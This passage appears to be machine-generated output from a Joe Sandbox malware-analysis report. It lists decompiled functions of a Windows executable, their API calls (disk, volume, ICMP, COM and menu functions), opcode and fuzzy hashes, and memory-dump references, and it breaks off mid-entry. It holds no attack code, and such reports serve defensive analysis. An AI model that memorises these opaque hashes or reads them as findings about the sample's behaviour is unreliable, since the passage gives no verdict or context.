                                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                          Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                          Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                          Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                          Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                          Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                          Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                          Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                          • String ID: crts
                                                                          • API String ID: 943502515-3724388283
                                                                          • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                          • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                          Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                                          • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                                          • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                                          • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                                          Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$LabelVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2006950084-234962358
                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                          Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                          • String ID: 0
                                                                          • API String ID: 772068139-4108050209
                                                                          • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                          • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                          Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcscpy
                                                                          • String ID: 3, 3, 8, 1
                                                                          • API String ID: 3469035223-357260408
                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                          Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                          • API String ID: 2574300362-3530519716
                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                          Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                          • API String ID: 2574300362-275556492
                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                          Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                          • API String ID: 2574300362-58917771
                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                          Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
